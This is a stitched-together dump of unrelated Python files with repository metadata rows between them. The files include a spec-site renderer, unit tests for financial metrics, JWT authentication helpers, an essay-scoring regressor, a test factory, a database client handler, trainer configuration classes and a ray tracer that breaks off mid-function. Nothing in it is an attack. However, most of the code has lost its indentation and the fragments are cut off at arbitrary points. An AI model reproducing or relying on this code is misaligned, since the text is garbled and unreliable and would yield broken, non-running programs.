for dataset, s in tables["dataset"].items():
if not s.get("key-field", ""):
s["key-field"] = dataset
if not s.get("name", ""):
s["name"] = tables["field"][dataset]["name"]
if not s.get("description", "") and dataset in tables["field"]:
s["description"] = tables["field"][dataset]["description"]
def dataset_sort(dataset):
fields = sorted(tables["dataset-field"][dataset])
if dataset in fields:
fields.pop(fields.index(dataset))
fields = [dataset] + fields
# move default register fields to end, order is same as in list
for field in ["entry-date", "start-date", "end-date"]:
fields.append(fields.pop(fields.index(field)))
return fields
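# e.g. for a hypothetical dataset 'tree' with fields ['geometry', 'tree', 'name', 'entry-date',
# 'start-date', 'end-date'], dataset_sort('tree') returns
# ['tree', 'geometry', 'name', 'entry-date', 'start-date', 'end-date']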
if __name__ == "__main__":
env = setup_jinja()
md = markdown.Markdown()
env.filters["markdown"] = lambda text: jinja2.Markup(
md.convert(text)
.replace("<p>", '<p class="govuk-body">')
.replace("<ul>", '<ul class="govuk-list govuk-list--bullet">')
)
env.filters["commanum"] = lambda v: "{:,}".format(v)
env.filters["dataset_sort"] = dataset_sort
for table in tables:
load(table)
default_names()
index_typologies()
index_datatype()
index_field()
index_dataset()
index_datapackage()
for template in ["datapackage", "dataset", "field", "datatype", "typology"]:
for name, item in tables[template].items():
render(
"%s/%s/index.html" % (template, name),
env.get_template(template + ".html"),
name=name,
item=item,
tables=tables,
staticPath=staticPath,
assetPath=assetPath,
)
for path, template in [
("index.html", "specifications.html"),
("datapackage/index.html", "datapackages.html"),
("dataset/index.html", "datasets.html"),
("field/index.html", "fields.html"),
("datatype/index.html", "datatypes.html"),
("typology/index.html", "typologies.html"),
]:
render(
path,
env.get_template(template),
tables=tables,
staticPath=staticPath,
assetPath=assetPath,
)
| 32.11165
| 82
| 0.584278
|
8751a04a69a9b944cd91ae177b6eb16ab1a43c39
| 1,747
|
py
|
Python
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 35
|
2015-03-12T04:16:14.000Z
|
2020-12-17T18:10:15.000Z
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 31
|
2015-03-16T21:31:04.000Z
|
2021-01-26T00:12:34.000Z
|
venv/Lib/site-packages/pynance/tst/unit/learn/test_metrics.py
|
LeonardoHMS/imobi
|
6b2b97a05df67ea7d493f7b601382f65c6629cc2
|
[
"MIT"
] | 18
|
2015-09-30T10:40:26.000Z
|
2021-01-25T21:20:44.000Z
|
"""
Copyright (c) 2016 Marshall Farrier
license http://opensource.org/licenses/MIT
@author: Marshall Farrier
@contact: marshalldfarrier@gmail.com
@since: 2016-02-01
@summary: Unit tests for machine learning metrics
"""
import unittest
import numpy as np
import pynance as pn
class TestMetrics(unittest.TestCase):
def ndarr_almost_eq(self, a, b, msg=None):
if not np.allclose(a, b):
print('ndarrays not equal:')
print(a)
print(b)
raise self.failureException(msg)
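    # the tests below register this comparator via addTypeEqualityFunc so that assertEqual
    # on np.ndarray arguments is delegated to np.allclose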
def test_mse_vector(self):
actual = np.array([1., 2., 3.])
predicted = np.array([2., 4., 2.])
self.assertAlmostEqual(pn.learn.mse(predicted, actual), 2.)
def test_mse_matrix(self):
self.addTypeEqualityFunc(np.ndarray, self.ndarr_almost_eq)
actual = np.array([
[1., 3.],
[2., 1.],
[3., 2.]])
predicted = np.array([
[2., 1.],
[4., -1.],
[2., 3.]])
self.assertEqual(pn.learn.mse(predicted, actual), np.array([2., 3.]))
def test_stderr_vector(self):
actual = np.array([-1., 0., 1.])
predicted = np.array([1., 2., -1.])
self.assertAlmostEqual(pn.learn.stderr(predicted, actual), 2.)
def test_stderr_matrix(self):
self.addTypeEqualityFunc(np.ndarray, self.ndarr_almost_eq)
actual = np.array([
[1., -1.],
[2., 0.],
[3., 1.]])
predicted = np.array([
[2., 1.],
[1., 2.],
[2., -1.]])
self.assertEqual(pn.learn.stderr(predicted, actual), np.array([1., 2.]))
if __name__ == '__main__':
unittest.main()
| 28.177419
| 80
| 0.534058
|
05daac84fa0a7c997bdef100f9e789fb8347a524
| 620
|
py
|
Python
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 1
|
2022-02-21T19:46:20.000Z
|
2022-02-21T19:46:20.000Z
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 37
|
2021-10-18T18:33:26.000Z
|
2022-03-31T12:38:38.000Z
|
euphro_auth/jwt/api_views.py
|
betagouv/euphrosyne
|
a67857a8716b5060cd9a2c6fa5f3d45c3fff435a
|
[
"MIT"
] | 2
|
2022-03-03T15:41:30.000Z
|
2022-03-07T14:20:26.000Z
|
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAdminUser
from rest_framework_simplejwt.views import TokenViewBase
from .serializers import SessionTokenObtainSerializer
class SessionTokenObtainPairView(TokenViewBase):
"""
Takes an authenticated request and returns an access and refresh JSON web
token pair to prove the authentication of those credentials.
"""
authentication_classes = [SessionAuthentication]
permission_classes = [IsAdminUser] # permission to user with `is_staff`
serializer_class = SessionTokenObtainSerializer
| 36.470588
| 77
| 0.817742
|
bfd3be362b6c824c577cc210732f35c096dc8dac
| 5,314
|
py
|
Python
|
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | 1
|
2018-02-07T15:01:19.000Z
|
2018-02-07T15:01:19.000Z
|
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | null | null | null |
all_features_benchmark.py
|
RDulepet19/AES
|
c7d1eef3537313d18ef36c0ba232f8270f60faf1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python2.7
import re
from sklearn.ensemble import RandomForestRegressor
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
import pickle
# from imp import reload
# import sys
# reload(sys)
# sys.setdefaultencoding('utf8')
global_one_essay_set_train = None
global_features_one_essay_set_train = None
global_rf = None
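# selectKImportance keeps only the k columns of X with the highest feature_importances_
# of a fitted model; extract_features applies every feature function to each essay.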
def selectKImportance(model, X, k=5):
return X[:,model.feature_importances_.argsort()[::-1][:k]]
def extract_features(essays, feature_functions):
return [[f(es) for f in feature_functions] for es in essays]
def main():
global global_one_essay_set_train
global global_features_one_essay_set_train
global global_rf
print("Reading Dataset")
# normalized_data_set = pd.DataFrame(pd.read_table('../data/normalized_data_set.tsv', encoding = 'ISO-8859-1'))
watson_readability_spelling_entities_features_dataset = pd.read_excel('./watson_readability_spelling_entities_features_data_set.xlsx')
basic_stats_features_dataset = pd.read_excel('./essay_basic_stats_features_data_set.xlsx')
merged_features_dataset = pd.merge(basic_stats_features_dataset, watson_readability_spelling_entities_features_dataset, on=['essay_set','essay_id'])
# merged_features_dataset = basic_stats_features_dataset
# randomly shuffle before splitting into training and test set
shuffled_merged_features_dataset = merged_features_dataset.sample(frac=1)
'''
for index, row in shuffled_normalized_data_set.iterrows():
# extract features for each essay
shuffled_normalized_data_set.set_value(index, "character_count", get_character_count(row['essay']))
shuffled_normalized_data_set.set_value(index, "word_count", get_word_count(row['essay']))
# feature_functions = [get_character_count, get_word_count]
'''
train, test = train_test_split(shuffled_merged_features_dataset, test_size = 0.2)
test_result_files = []
essay_set_keys = train.essay_set.unique()
for idx_essay_set in essay_set_keys:
one_essay_set_train = train.loc[train['essay_set'] == idx_essay_set]
one_essay_set_test = test.loc[test['essay_set'] == idx_essay_set]
rf = RandomForestRegressor(n_estimators = 1000, max_features = 50)
exclude_features = ['essay_set', 'essay_id', 'essay', 'score'] #, 'character_count', 'word_count', '5char_count', '6char_count', '7char_count', '8char_count', 'unique_words_count', 'fourth_root_word_count', 'flesch_reading_ease', 'smog_index', 'flesch_kincaid_grade', 'coleman_liau_index', 'automated_readability_index', 'dale_chall_readability_score', 'difficult_words', 'linsear_write_formula', 'gunning_fog']
# rf.fit(features_one_essay_set_train, one_essay_set_train["score"])
features_one_essay_set_train = one_essay_set_train.loc[:, one_essay_set_train.columns.difference(exclude_features)]
rf.fit(features_one_essay_set_train.values, one_essay_set_train["score"])
output_model = open("./model_essay_set_"+str(idx_essay_set)+".mb", 'wb')
pickle.dump(rf, output_model)
output_model.close()
'''
global_one_essay_set_train = one_essay_set_train
global_features_one_essay_set_train = features_one_essay_set_train
global_rf = rf
top_features_one_essay_set_train = selectKImportance(rf, features_one_essay_set_train.values, 50)
'''
# rf_top_features = RandomForestRegressor(n_estimators = 100)
# rf_top_features.fit(top_features_one_essay_set_train, one_essay_set_train["score"])
# print("===IMPORTANT FEATURES====\n\t",rf.feature_importances_)
# print("Features sorted by their score:")
# print(sorted(zip(map(lambda x: round(x, 4), rf.feature_importances_), list(global_one_essay_set_train.columns)[4:],reverse=True)))
# predicted_scores = rf.predict(features_one_essay_set_test)
predicted_scores = rf.predict(one_essay_set_test.loc[:, one_essay_set_test.columns.difference(exclude_features)])
one_essay_set_test['predicted_score'] = predicted_scores
one_essay_set_test['predicted_score'] = one_essay_set_test['predicted_score'].round()
one_essay_set_test['expected_score'] = one_essay_set_test['score'].round()
# one_essay_set_test.to_csv("test_results_"+str(idx_essay_set)+".tsv", sep='\t', encoding='ISO-8859-1', columns=['essay_set', 'essay_id', 'score', 'expected_score', 'predicted_score'])
writer = pd.ExcelWriter("./test_results_"+str(idx_essay_set)+".xlsx")
one_essay_set_test.to_excel(writer, sheet_name="results", index=False, columns=['essay_set', 'essay_id', 'score', 'expected_score', 'predicted_score'])
writer.save()
test_result_files.append("./test_results_"+str(idx_essay_set)+".xlsx")
# combine all test result files into a single file
combined_test_results_df = pd.DataFrame()
for a_file in test_result_files:
a_test_result_df = pd.read_excel(a_file)
combined_test_results_df = pd.concat([combined_test_results_df, a_test_result_df])
# write combined file to output
combined_test_results_df.to_csv("./combined_test_results.tsv", sep='\t', encoding='ISO-8859-1', index=False)
if __name__=="__main__":
main()
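A hedged companion sketch, assuming the model files written by main() above: load one pickled per-essay-set regressor and score a new block of feature rows. The helper name and the requirement that the columns match the training features are assumptions.
import pickle

import numpy as np


def score_essays(essay_set_idx, feature_matrix):
    # feature_matrix: 2-D array whose columns match the training features
    # (everything except essay_set, essay_id, essay and score).
    with open('./model_essay_set_{}.mb'.format(essay_set_idx), 'rb') as f:
        model = pickle.load(f)
    # RandomForestRegressor predicts continuous values; round to match the
    # integer scores used for evaluation above.
    return np.round(model.predict(feature_matrix))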
| 50.609524
| 419
| 0.740685
|
8607f00fb486ce9751025ee778aae3a589864138
| 570
|
py
|
Python
|
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
app/api/v1/utilities/auth.py
|
kathy254/Store-Manager-API
|
ef83a71113f28febe7d410f30a9a48e147645c46
|
[
"MIT"
] | null | null | null |
import jwt
from flask import request
from functools import wraps
from instance.config import secret_key
def get_token(f):
@wraps(f)
def decorated(*arg, **kwargs):
token = None
if 'X-API-KEY' in request.headers:
token = request.headers['X-API-KEY']
if not token:
return {'result': 'no token found'}, 401
try:
# raises jwt.InvalidTokenError (or a subclass) if the token is bad or expired
jwt.decode(token, secret_key, algorithms=['HS256'])
except jwt.InvalidTokenError:
return {'result': 'Invalid token'}, 401
return f(*arg, **kwargs)
return decorated
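A hedged usage sketch for the decorator above on a plain Flask view; the app object, route, and handler are invented for illustration and assume the decorator lives in the same module.
from flask import Flask

app = Flask(__name__)


@app.route('/api/v1/products')
@get_token
def list_products():
    # Only reached when a valid X-API-KEY token was supplied.
    return {'result': 'ok'}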
| 27.142857
| 73
| 0.594737
|
c4145d2fdef983dfc50590276d7264afaef9f940
| 404
|
py
|
Python
|
aleph/tests/factories/models/collection.py
|
jalmquist/aleph
|
28a56bc7edd77dbd7910c94dac40916032edc177
|
[
"MIT"
] | 7
|
2020-02-18T14:35:10.000Z
|
2020-03-09T22:53:10.000Z
|
aleph/tests/factories/models/collection.py
|
heartofstone/aleph
|
d66b6615d2bfa10c291c63754f53b468de8bebde
|
[
"MIT"
] | 7
|
2017-08-16T12:49:23.000Z
|
2018-02-16T10:22:11.000Z
|
aleph/tests/factories/models/collection.py
|
heartofstone/aleph
|
d66b6615d2bfa10c291c63754f53b468de8bebde
|
[
"MIT"
] | 6
|
2017-07-26T12:29:53.000Z
|
2017-08-18T09:35:50.000Z
|
import factory
from aleph.core import db
from aleph.model import Collection
class CollectionFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = Collection
sqlalchemy_session = db.session
foreign_id = factory.Faker('uuid4')
label = factory.Faker('company')
countries = factory.Sequence(
lambda n: [factory.Faker('country_code').generate({})])
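A minimal sketch of how a factory like this is typically exercised in a test; the assertions and the surrounding app/session setup are assumptions, while the factory_boy calls themselves (instantiation and create_batch) are standard.
def test_collection_defaults():
    collection = CollectionFactory()           # built and added to db.session
    assert collection.foreign_id is not None
    assert collection.label
    batch = CollectionFactory.create_batch(3)  # three more collections
    assert len(batch) == 3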
| 23.764706
| 64
| 0.710396
|
de70fb75b519752b971f2b1652d68d1bdb6bd6a6
| 1,271
|
py
|
Python
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 3
|
2020-03-17T09:27:25.000Z
|
2020-05-29T20:31:38.000Z
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 5
|
2020-05-12T07:35:21.000Z
|
2020-09-10T15:27:47.000Z
|
immudb/handler/zadd.py
|
codenotary/immu-py
|
a0607041247ad0aedb3791318fa2ce17d03f796b
|
[
"Apache-2.0"
] | 3
|
2020-04-08T08:16:26.000Z
|
2020-09-08T07:46:02.000Z
|
# Copyright 2022 CodeNotary, Inc. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from immudb.grpc import schema_pb2
from immudb.grpc import schema_pb2_grpc
from immudb.rootService import RootService
from immudb.exceptions import ErrCorruptedData
from immudb import datatypes
def call(service: schema_pb2_grpc.ImmuServiceStub, rs: RootService, zset: bytes, score: float, key: bytes, atTx: int = 0):
request = schema_pb2.ZAddRequest(
set=zset,
score=score,
key=key,
atTx=atTx,
boundRef=atTx > 0,
)
msg = service.ZAdd(request)
if msg.nentries != 1:
raise ErrCorruptedData
return datatypes.SetResponse(
id=msg.id,
verified=False,
)
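A hedged sketch of invoking the handler above; how the gRPC stub and RootService are obtained is left to the caller and is not part of this module.
def zadd_example(service, root_service):
    # Adds key b'player:1' to the sorted set b'highscores' with score 42.0.
    response = call(service, root_service, zset=b'highscores',
                    score=42.0, key=b'player:1')
    return response.id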
| 34.351351
| 122
| 0.727773
|
92996aeed29c9884cfbc8b4293d83c0f9c329cd6
| 363
|
py
|
Python
|
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
dataclass.py
|
hotoku/exercises-in-style
|
c2c737d141241479931a6ae85089bf202afc64bf
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
@dataclass
class FizzBuzz:
n: int
def __str__(self):
if self.n % 15 == 0:
return "FizzBuzz"
elif self.n % 3 == 0:
return "Fizz"
elif self.n % 5 == 0:
return "Buzz"
else:
return str(self.n)
for n in range(1, 101):
print(FizzBuzz(n))
| 17.285714
| 33
| 0.504132
|
8031b06baa36d2473213b19dcac5e76d7e7283c4
| 9,552
|
py
|
Python
|
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | 2
|
2022-03-17T04:48:04.000Z
|
2022-03-20T09:06:19.000Z
|
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | null | null | null |
composer/trainer/trainer_hparams.py
|
Averylamp/composer
|
1afc56e9c207734aee75ff8c5b046fb55d928fb5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 MosaicML. All Rights Reserved.
"""
Example usage and definition of hparams
"""
from __future__ import annotations
import os
from dataclasses import dataclass
from typing import TYPE_CHECKING, List, Optional
import yahp as hp
import composer
import composer.datasets as datasets
from composer.algorithms import AlgorithmHparams, get_algorithm_registry
from composer.callbacks import (BenchmarkerHparams, CallbackHparams, GradMonitorHparams, LRMonitorHparams,
MemoryMonitorHparams, SpeedMonitorHparams, TorchProfilerHparams)
from composer.core.types import Precision
from composer.datasets import DataloaderHparams
from composer.loggers import (BaseLoggerBackendHparams, FileLoggerBackendHparams, TQDMLoggerBackendHparams,
WandBLoggerBackendHparams)
from composer.models import (CIFARResNetHparams, EfficientNetB0Hparams, GPT2Hparams, MnistClassifierHparams,
ModelHparams, ResNet18Hparams, ResNet50Hparams, ResNet101Hparams, UnetHparams)
from composer.optim import (AdamHparams, AdamWHparams, DecoupledAdamWHparams, DecoupledSGDWHparams, OptimizerHparams,
RAdamHparams, RMSPropHparams, SchedulerHparams, SGDHparams, scheduler)
from composer.trainer.ddp import DDPHparams
from composer.trainer.devices import CPUDeviceHparams, DeviceHparams, GPUDeviceHparams
if TYPE_CHECKING:
from composer.trainer.trainer import Trainer
optimizer_registry = {
"adam": AdamHparams,
"adamw": AdamWHparams,
"decoupled_adamw": DecoupledAdamWHparams,
"radam": RAdamHparams,
"sgd": SGDHparams,
"decoupled_sgdw": DecoupledSGDWHparams,
"rmsprop": RMSPropHparams,
}
scheduler_registry = {
"step": scheduler.StepLRHparams,
"multistep": scheduler.MultiStepLRHparams,
"exponential": scheduler.ExponentialLRHparams,
"cosine_decay": scheduler.CosineAnnealingLRHparams,
"cosine_warmrestart": scheduler.CosineAnnealingWarmRestartsHparams,
"warmup": scheduler.WarmUpLRHparams,
"constant": scheduler.ConstantLRHparams,
}
model_registry = {
"unet": UnetHparams,
"efficientnetb0": EfficientNetB0Hparams,
"resnet56_cifar10": CIFARResNetHparams,
"resnet101": ResNet101Hparams,
"resnet50": ResNet50Hparams,
"resnet18": ResNet18Hparams,
"mnist_classifier": MnistClassifierHparams,
"gpt2": GPT2Hparams,
}
dataset_registry = {
"brats": datasets.BratsDatasetHparams,
"imagenet": datasets.ImagenetDatasetHparams,
"cifar10": datasets.CIFAR10DatasetHparams,
"synthetic": datasets.SyntheticDatasetHparams,
"mnist": datasets.MNISTDatasetHparams,
"lm": datasets.LMDatasetHparams,
}
algorithms_registry = get_algorithm_registry()
callback_registry = {
"pytorch_profiler": TorchProfilerHparams,
"speed_monitor": SpeedMonitorHparams,
"benchmarker": BenchmarkerHparams,
"lr_monitor": LRMonitorHparams,
"grad_monitor": GradMonitorHparams,
"memory_monitor": MemoryMonitorHparams,
}
logger_registry = {
"file": FileLoggerBackendHparams,
"wandb": WandBLoggerBackendHparams,
"tqdm": TQDMLoggerBackendHparams,
}
device_registry = {
"gpu": GPUDeviceHparams,
"cpu": CPUDeviceHparams,
}
@dataclass
class TrainerHparams(hp.Hparams):
"""Params for the :class:`Trainer`.
See the documentation for the :class:`Trainer`.
"""
hparams_registry = { # type: ignore
"algorithms": algorithms_registry,
"optimizer": optimizer_registry,
"schedulers": scheduler_registry,
"loggers": logger_registry,
"model": model_registry,
"train_dataset": dataset_registry,
"val_dataset": dataset_registry,
"callbacks": callback_registry,
"device": device_registry,
}
device: DeviceHparams = hp.required(doc="Device Parameters")
train_dataset: datasets.DatasetHparams = hp.required(doc="Training dataset hparams")
val_dataset: datasets.DatasetHparams = hp.required(doc="Validation dataset hparams")
optimizer: OptimizerHparams = hp.required(doc="Optimizer to use")
model: ModelHparams = hp.required(doc="model")
loggers: List[BaseLoggerBackendHparams] = hp.required(doc="loggers to use")
max_epochs: int = hp.required(
doc="training time in epochs and/or batches (e.g., 90ep5ba)",
template_default=10,
)
total_batch_size: int = hp.required(
doc="batch size for each optimization step, across all devices and gradient accumulations.",
template_default=2048,
)
eval_batch_size: int = hp.required(
doc="batch size to use for each evaluation step",
template_default=2048,
)
dataloader: DataloaderHparams = hp.required(doc="dataloader hparams")
grad_accum: int = hp.required(
template_default=1,
doc=
"Determines the number of microbatches to split a per-gpu batch into, used to compensate for low-memory-capacity devices."
)
precision: Precision = hp.required(doc="Precision to use for training", template_default=Precision.AMP)
ddp: DDPHparams = hp.optional(doc="DDP configuration", default_factory=DDPHparams)
grad_clip_norm: Optional[float] = hp.optional(
default=None, doc='the norm to clip gradient magnitudes to. Default: None (no clip)')
algorithms: List[AlgorithmHparams] = hp.optional(doc="Algorithms to employ", default_factory=list)
schedulers: List[SchedulerHparams] = hp.optional(doc="Scheduler sequence", default_factory=list)
seed: Optional[int] = hp.optional(default=None, doc="random seed to set")
validate_every_n_epochs: int = hp.optional(
doc="Validate every N epochs. Set to -1 to never validate on a epochwise frequency. Defaults to 1", default=1)
validate_every_n_batches: int = hp.optional(
doc="Validate every N batches. Set to -1 to never validate on a batchwise frequency. Defaults to -1.",
default=-1)
callbacks: List[CallbackHparams] = hp.optional(doc="Callback hparams", default_factory=list)
checkpoint_filepath: Optional[str] = hp.optional(doc="Path to an existing checkpoint file to load from.",
default=None)
checkpoint_interval_unit: Optional[str] = hp.optional(
doc=
"Unit for the checkpoint save interval -- should be 'ep' for epochs; 'ba' for batches, or None to disable checkpointing",
default=None)
checkpoint_interval: int = hp.optional(doc="Interval for checkpointing.", default=1)
checkpoint_folder: str = hp.optional(doc="Folder in which to save checkpoint files", default="checkpoints")
deterministic_mode: bool = hp.optional(doc="Run the model deterministically. Experimental. Performance"
"degradations expected. Certain Torch modules may not have"
"deterministic implementations, which will result in a crash.",
default=False)
compute_training_metrics: bool = hp.optional(doc="Log validation metrics on training data", default=False)
log_level: str = hp.optional(doc="Python loglevel to use composer", default="INFO")
ddp_sync_strategy: Optional[str] = hp.optional(doc="Strategy for DDP syncing", default=None)
def validate(self):
super().validate()
num_procs = 1
if isinstance(self.device, GPUDeviceHparams) and self.device.n_gpus > 0:
num_procs = self.device.n_gpus
if isinstance(self.device, CPUDeviceHparams) and self.device.n_cpus > 0:
num_procs = self.device.n_cpus
if self.total_batch_size % (num_procs * self.ddp.num_nodes) != 0:
raise ValueError(
f"batch size ({self.total_batch_size}) not divisible by the number of proccesses per node ({num_procs}) "
f"times the number of nodes ({self.ddp.num_nodes} ")
if self.eval_batch_size % (num_procs * self.ddp.num_nodes) != 0:
raise ValueError(
f"eval batch size ({self.eval_batch_size}) not divisible by the number of proccesses per node ({num_procs}) "
f"times the number of nodes ({self.ddp.num_nodes}")
def initialize_object(self) -> Trainer:
from composer.trainer.trainer import Trainer
return Trainer.create_from_hparams(hparams=self)
def set_datadir(self, datadir: str) -> None:
"""Override the ``datadir`` property in the :attr:`train_dataset` and :attr:`val_dataset`.
Args:
datadir (str): The datadir
Raises:
AttributeError: Raised if either :attr:`train_dataset` or :attr:`val_dataset` do not
have a ``datadir`` property.
"""
if not hasattr(self.train_dataset, 'datadir') or not hasattr(self.val_dataset, 'datadir'):
raise AttributeError('Both the train and val dataset hparams must have the datadir attribute.')
setattr(self.train_dataset, 'datadir', datadir)
setattr(self.val_dataset, 'datadir', datadir)
@classmethod
def load(cls, model: str) -> TrainerHparams:
model_hparams_file = os.path.join(
os.path.dirname(composer.__file__),
"yamls",
"models",
f"{model}.yaml",
)
trainer_hparams = TrainerHparams.create(model_hparams_file, cli_args=False)
assert isinstance(trainer_hparams, TrainerHparams), "trainer hparams should return an instance of self"
return trainer_hparams
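A hedged end-to-end sketch using the hparams class above; the model name, data directory, and the assumption that the resulting Trainer exposes a fit() method are illustrative, not guaranteed by this file.
def train_from_yaml(model_name: str, datadir: str):
    hparams = TrainerHparams.load(model_name)   # e.g. a bundled 'resnet18' YAML
    hparams.set_datadir(datadir)
    hparams.validate()
    trainer = hparams.initialize_object()
    trainer.fit()                               # assumed Trainer entry point
    return trainer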
| 41.894737
| 130
| 0.696922
|
1172a55dd2c09451bcf0bb2ecb5c979a8794e682
| 6,378
|
py
|
Python
|
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | 2
|
2017-07-13T08:06:32.000Z
|
2018-11-22T05:04:44.000Z
|
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | null | null | null |
Milo Yip's ray-tracing bencmark/smallpt_python/smallpt.py
|
THISISAGOODNAME/miniRayTracing
|
48b8fc54df0f11d784bcd783885bc9b39d5ae7b1
|
[
"MIT"
] | null | null | null |
import math
import time
import sys
class RandomLCG:
def __init__(self, seed):
self.seed = seed
def __call__(self) :
self.seed = (214013 * self.seed + 2531011) % 0x100000000
return self.seed * (1.0 / 4294967296.0)
class Vec:
def __init__(self, x, y, z):
self.x = x
self.y = y
self.z = z
def __add__(self, b):
return Vec(self.x + b.x, self.y + b.y, self.z + b.z)
def __sub__(self, b):
return Vec(self.x - b.x, self.y - b.y, self.z - b.z)
def __mul__(self, b):
return Vec(self.x * b, self.y * b, self.z * b)
def mult(self, b):
return Vec(self.x * b.x, self.y * b.y, self.z * b.z)
def norm(self):
return self * (1.0 / math.sqrt(self.x * self.x + self.y * self.y + self.z * self.z))
def __pow__(self, b): # dot product
return self.x * b.x + self.y * b.y + self.z * b.z
def __mod__(self, b):
return Vec(self.y * b.z - self.z * b.y, self.z * b.x - self.x * b.z, self.x * b.y - self.y * b.x)
Vec.Zero = Vec(0, 0, 0)
Vec.XAxis = Vec(1, 0, 0)
Vec.YAxis = Vec(0, 1, 0)
Vec.ZAxis = Vec(0, 0, 1)
class Refl:
(DIFF, SPEC, REFR) = range(3)
class Ray:
def __init__(self, o, d):
self.o = o
self.d = d
class Sphere:
def __init__(self, rad, p, e, c, refl):
self.rad = rad
self.p = p
self.e = e
self.c = c
self.refl = refl
self.sqRad = rad * rad
self.maxC = max(c.x, c.y, c.z)
if self.maxC == 0:
self.cc = Vec.Zero
else:
self.cc = c * (1.0 / self.maxC)
def intersect(self, r):
# Solve t^2*d.d + 2*t*(o-p).d + (o-p).(o-p)-R^2 = 0
op = self.p - r.o
b = op ** r.d
det = b * b - op ** op + self.sqRad
eps = 1e-4
if det < 0:
return 0
else:
dets = math.sqrt(det)
if b - dets > eps:
return b - dets
elif b + dets > eps:
return b + dets
else:
return 0
# Scene: radius, position, emission, color, material
spheres = [
Sphere(1e5, Vec( 1e5+1,40.8,81.6), Vec.Zero, Vec(.75,.25,.25), Refl.DIFF), #Left
Sphere(1e5, Vec(-1e5+99,40.8,81.6), Vec.Zero, Vec(.25,.25,.75), Refl.DIFF), #Rght
Sphere(1e5, Vec(50,40.8, 1e5), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Back
Sphere(1e5, Vec(50,40.8,-1e5+170), Vec.Zero, Vec.Zero, Refl.DIFF), #Frnt
Sphere(1e5, Vec(50, 1e5, 81.6), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Botm
Sphere(1e5, Vec(50,-1e5+81.6,81.6), Vec.Zero, Vec(.75,.75,.75), Refl.DIFF), #Top
Sphere(16.5, Vec(27,16.5,47), Vec.Zero, Vec(1,1,1)*.999, Refl.SPEC), #Mirr
Sphere(16.5, Vec(73,16.5,78), Vec.Zero, Vec(1,1,1)*.999, Refl.REFR), #Glas
Sphere(600, Vec(50,681.6-.27,81.6), Vec(12,12,12), Vec.Zero, Refl.DIFF) #Lite
]
rand = RandomLCG(0)
def clamp(x):
if x < 0:
return 0
elif x > 1:
return 1
else:
return x
def toInt(x):
return int((clamp(x) ** (1 / 2.2)) * 255 + .5)
def intersect(r):
t = 1e20
obj = None  # avoid NameError when the ray misses every sphere
for s in spheres:
d = s.intersect(r)
if d != 0 and d < t:
t = d
obj = s
return obj, t
def radiance(r, depth):
obj, t = intersect(r)
if obj == None:
return Vec.Zero # if miss, return black
else:
newDepth = depth + 1
isMaxDepth = newDepth > 100
# Russian roulette for path termination
isUseRR = newDepth > 5
isRR = isUseRR and rand() < obj.maxC
if isMaxDepth or (isUseRR and not isRR):
return obj.e
else:
f = (isUseRR and isRR) and obj.cc or obj.c
x = r.o + r.d * t
n = (x - obj.p).norm()
nl = n ** r.d < 0 and n or n * -1
if obj.refl == Refl.DIFF: # Ideal DIFFUSE reflection
r1 = 2 * math.pi * rand()
r2 = rand()
r2s = math.sqrt(r2)
w = nl
wo = abs(w.x) > .1 and Vec.YAxis or Vec.XAxis
u = (wo % w).norm()
v = w % u
d = (u * (math.cos(r1) * r2s) + v * (math.sin(r1) * r2s) + w * math.sqrt(1 - r2)).norm()
return obj.e + f.mult(radiance(Ray(x, d), newDepth))
